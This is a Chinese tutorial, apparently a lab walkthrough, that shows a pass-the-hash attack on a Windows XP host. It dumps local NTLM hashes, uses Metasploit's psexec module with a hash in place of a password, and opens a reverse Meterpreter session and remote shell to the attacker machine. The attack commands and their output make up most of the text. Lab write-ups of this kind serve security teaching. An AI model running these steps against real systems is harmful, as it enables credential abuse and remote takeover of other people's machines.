VIP · 2012/12/28 16:13

首先,在本地主机(假设为目标主机)  新建一个wooyun用户,并为之设置密码,然后通过gethashes.exe获取到HASH

C:\>net user wooyun test The command completed successfully. C:\>gethashes.exe $local 1:1007:C2265B23734E0DACAAD3B435B51404EE:69943C5E63B4D2C104DBBCC15138B72B::: Administrator:500:0A174C1272FCBCF7804E0502081BA8AE:83F36A86631180CB9F5F53F5F45DF B2B::: Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0::: HelpAssistant:1000:CF88594C2AC20629EEF3D6DABD2DA92D:0FCE98570CBB9C14E8FF200353B2 707B::: wooyun:1003:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537::: SUPPORT_388945a0:1002:AAD3B435B51404EEAAD3B435B51404EE:F9E8AE6C7229EA07EFAC12715 F954B83::: **vmware_user**:1006:AAD3B435B51404EEAAD3B435B51404EE:915D1CEE456EA4DD6A8094F7CE 094448::: C:\>
复制代码

然后我再返回我的BT虚拟机(攻击者主机)使用MSF进行测试,MSF自带的PSEXEC模块具有HASH传递攻击功能

[email protected]:~# msfconsole ##                          ###           ##    ## ##  ##  #### ###### ####  #####   #####    ##    ####        ######   ###### # ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##   ###### # ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##   ## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##   ##   ##  #### ###   #####   #####     ##   ####   ####   #### ###   ## =[ metasploit v3.7.0-release [core:3.7 api:1.0] + \-- -|-=[ 684 exploits - 355 auxiliary + \-- -|-=[ 217 payloads - 27 encoders - 8 nops =[ svn r12536 updated 76 days ago (2011.05.04) Warning: This copy of the Metasploit Framework was last updated 76 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: http://www.metasploit.com/redmine/projects/framework/wiki/Updating msf > use exploit/windows/smb/psexec msf exploit(psexec) > show options Module options (exploit/windows/smb/psexec): Name       Current Setting  Required  Description \---|-       \---|\---|\---|\---|\---|  \---|\---|--  \---|\---|\---|-- RHOST                       yes       The target address RPORT      445              yes       Set the SMB service port SHARE      ADMIN$           yes       The share to connect to, can be an admi                                              n share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain  WORKGROUP        no        The Windows domain to use for authentic                                              ation SMBPass                     no        The password for the specified username SMBUser                     no        The username to authenticate as Exploit target: Id  Name --  \---|- 0   Automatic msf exploit(psexec) > set RHOST 192.168.0.254 RHOST => 192.168.0.254 msf exploit(psexec) > set SMBUser wooyun SMBUser => wooyun msf exploit(psexec) > set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537                                             SMBPass => 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 msf exploit(psexec) > show options Module options (exploit/windows/smb/psexec): Name       Current Setting                                                                                                  Required Description \---|-       \---|\---|\---|\---|\---|                                                                                                  \---|\---|--  \---|-- \---|\---| RHOST      192.168.0.254                                                                                                    yes       The target address RPORT      445                                                                                                              yes       Set the SMB service port SHARE      ADMIN$                                                                                                           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a n                                              ormal read/write folder share SMBDomain  WORKGROUP                                                                                                        no        The Windows domain to use for authentication SMBPass    01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537                                                no        The password for the specified username SMBUser    wooyun                                                                                                           no        The username to authenticate as Exploit target: Id  Name --  \---|- 0   Automatic msf exploit(psexec) > exploit [*] Started reverse handler on 192.168.0.3:4444 </p>
[</em>] Connecting to the server... [*] Authenticating to 192.168.0.254:445|WORKGROUP as user 'wooyun'... </p>
[</em>] Uploading payload... [*] Created \UGdecsam.exe... </p>
[</em>] Binding to 367abb81-9844-35f1-ad32-98f038001003:[email protected]_np:192.168.0.254[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:[email protected]_np:192.168.0.254[\svcctl] ... </p>
[</em>] Obtaining a service manager handle... [*] Creating a new service (MZsCnzjn - "MrZdoQwIlbBIYZQJyumxYX")... </p>
[</em>] Closing service handle... [*] Opening service... </p>
[</em>] Starting the service... [*] Removing the service... </p>
[</em>] Closing service handle... [*] Deleting \UGdecsam.exe... </p>
[</em>] Sending stage (749056 bytes) to 192.168.0.254 [*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.254:1877) at 2011-07-19 03:57:17 +0800 meterpreter > sysinfo Computer        : WOOYUN-PC OS              : Windows XP (Build 2600, Service Pack 2). Architecture    : x86 System Language : zh_CN Meterpreter     : x86/win32 meterpreter > shell Process 4596 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>net user net user User accounts for \ \---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|\---|- **vmware_user**          1                        Administrator Guest                    HelpAssistant            wooyun SUPPORT_388945a0 The command completed with one or more errors. C:\WINDOWS\system32>
复制代码

至此,我们已经成功获得目标的CMDSHELL

使用Hash直接登录Windows相关推荐

  1. UWP 推荐 - 限时免费的RSS阅读器《RSS 追踪》登录 Windows 10

    文/云之幻 前不久,博客作者 Bravo Yeung 写了一篇还算略受欢迎的关于 RSS 的文章 .Net开发者必知的技术类RSS订阅指南. RSS 现在用的人很少了,而且就算是我,也不过是在一周前才 ...

  2. BigData/Cloud Computing:购买并登录Windows弹性云服务器之详细攻略(图文教程)—更优惠、更贴心!

    BigData/Cloud Computing:购买并登录Windows弹性云服务器之详细攻略(图文教程)-更优惠.更贴心! 导读:弹性云服务器(Elastic Cloud Server)是由CPU. ...

  3. 2012自动登录服务器,配置Windows自动登录 - Windows Server | Microsoft Docs

    打开自动登录Windows 09/08/2020 本文内容 本文介绍如何将Windows密码和其他相关信息存储在注册表数据库中,以自动执行登录过程. 通过使用此功能,其他用户可以启动计算机并使用您建立 ...

  4. windows服务器系统免登录,Mac系统登录Windows服务器

    #### 操作场景 下载地址:[Microsoft Remote Desktop for Mac](https://soft.wnana.com/Microsoft_Remote_Desktop_10 ...

  5. 如何在DOS下用TCP/IP协议进行登录Windows 2K?

    如何在DOS下用TCP/IP协议进行登录Windows 2K?  [ 作者:佚名    来源:本站原创    点击数:2172    更新时间:2004-3-31    文章录入:xiaofei ] ...

  6. 服务器远程登陆最大连接数,解决登录Windows服务器时超出了最大允许连接数

    登录Windows服务器时提示超出了最大允许连接数的解决方法分享给大家,一些网络维护技术人员常常需要利用远程桌面登录Windows服务器系统,有部分用户反映,当登入window服务器时,出现提示&qu ...

  7. 服务器登陆之后一直转无法显示桌面,如何解决远程登录Windows服务器无法显示桌面的问题?...

    概述 本文主要介绍解决远程登录Windows服务器无法显示桌面问题的方法. 详细信息 远程登录Windows登录服务器后,不显示桌面.使用 Ctrl+Alt+Delete 键调出任务管理器,在任务管理 ...

  8. mstsc远程登录windows服务器

    mstsc远程登录windows服务器 一.mstsc远程登录的流程 在电脑上输入win+r键,运行mstsc 在计算机处输入windows服务器的公网IP地址 输入登录服务器的账号名和密码,默认的远 ...

  9. 【Android】手机远程登录Windows服务器(使用Rd Client)

    概述 本文主要介绍:如何在Android端(手机)利用微软Remote Desktop Client应用远程连接Windows服务器. Remote Desktop Client是微软旗下一款非常实用 ...

最新文章

  1. (转)AS3函数动态添加实例属性
  2. linux redis 配置详解
  3. Linux 内核中的 GCC 特性(zz)
  4. BZOJ 1444 [JSOI2009]有趣的游戏 (AC自动机、概率与期望DP、矩阵乘法)
  5. rxjs里concatMap operators的用法
  6. ListBox之随手放个控件
  7. 深入理解DOM事件机制系列第四篇——事件模拟
  8. Ov两款骁龙865手机即将发布:其中一款或低于2999元
  9. 统计订单:复选+全选+计算 的列表
  10. 80-15-020-原理-零拷贝-Netty零拷贝的原理
  11. 华为云回应“关闭私有云”传闻 将进行业务调整形成混合云产品部
  12. 书单丨成为全栈工程师的5种硬实力
  13. 1*1的卷积核的作用
  14. 【android】环境变量的设置
  15. 5900x matlab,芯片工程师入手5900X平台,简单自用工具评测
  16. 冰点文库下载器去广告版百度文库下载工具
  17. tolua++ 参考手册
  18. 微信支付结算费率怎么降低至0.2~0.35操作方法
  19. 概率论基础(4)五种重要的分布(二项、泊松、均匀、指数、正态分布)
  20. java面向对象知识点整理--用前人智慧,为后人铺路

热门文章

  1. php处理html5文件上传代码,HTML5中文件上传的代码
  2. 启动马达接线实物图_电工知识:三相电机正反转的完整接线,实物讲解,原理分析...
  3. python实现数据库连接池_Python实现Mysql数据库连接池
  4. csgo如何保存自己的cfg_KXCSGO:CSGO开箱饰品交易方法
  5. Java高级技术笔记
  6. FPGA之道(70)提高设计的综合性能(二)提高设计的自测性
  7. FPGA之道(32)Verilog基本程序框架
  8. FPGA之道(21)HDL语言的选择
  9. 洛谷 P1843 奶牛晒衣服
  10. NodeJs教程(介绍总结!)终于在网上找到一个靠谱点的了T_T